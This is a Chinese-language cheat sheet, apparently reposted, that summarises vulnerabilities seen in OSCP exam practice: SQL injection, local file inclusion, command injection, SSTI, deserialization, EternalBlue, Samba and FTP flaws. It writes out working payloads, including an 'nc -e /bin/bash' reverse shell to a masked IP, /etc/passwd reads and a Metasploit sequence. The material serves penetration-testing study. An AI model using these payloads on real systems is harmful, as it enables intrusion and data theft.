文章总结: 本文总结了OSCP认证考试中常见的Web应用漏洞和服务漏洞,包括文件上传、SQL注入、本地文件包含、远程代码执行、SMB和FTP漏洞等,并提供了各种漏洞的具体利用方法和代码示例,帮助考生备考OSCP认证。 综合评分: 91 文章分类: 渗透测试,漏洞分析,WEB安全,实战经验,CTF
2. SQL注入漏洞
出现场景:多个Web应用登录页面、搜索功能利用方法:
# 1. 认证绕过
username: admin' or '1'='1
password: anything
# 2. 联合查询注入
' UNION SELECT 1,2,3,@@version--
3. 本地文件包含(LFI)
出现场景:EyesOfNetwork、各种CMS系统利用方法:
# 1. 读取敏感文件
http://target.com/page.php?file=../../../etc/passwd
# 2. 日志文件注入
http://target.com/page.php?file=../../../var/log/apache2/access.log
# 3. PHP包装器利用
php://filter/convert.base64-encode/resource=index.php
4. 远程代码执行(RCE)
出现场景:PlaySMS、Haraka SMTP、GitStack等利用方法:
# 1. 命令注入
; nc -e /bin/bash 192.168.XX.XX 1337
| whoami
`id`
# 2. 反序列化漏洞
O:8:"stdClass":1:{s:3:"cmd";s:10:"whoami";}
# 3. 模板注入(SSTI)
{{7*7}}
{{config.items()}}
二、服务漏洞
1. SMB相关漏洞
出现场景:EternalBlue(MS17-010)、SambaCry(CVE-2017-7494)利用方法:
# 1. EternalBlue利用
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.XX.XX
exploit
# 2. Samba共享利用
smbclient //192.168.XX.XX/share
put shell.php
2. FTP漏洞
出现场景:ProFTPD、vsftpd、自定义FTP服务利用方法:
# 1. 匿名登录
ftp 192.168.XX.XX
username: anonymous
password: anonymous
# 2. 目录遍历
CWD /../../../etc/passwd
`
查看原文:《OSCP必备技能18-往期真题漏洞合集》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论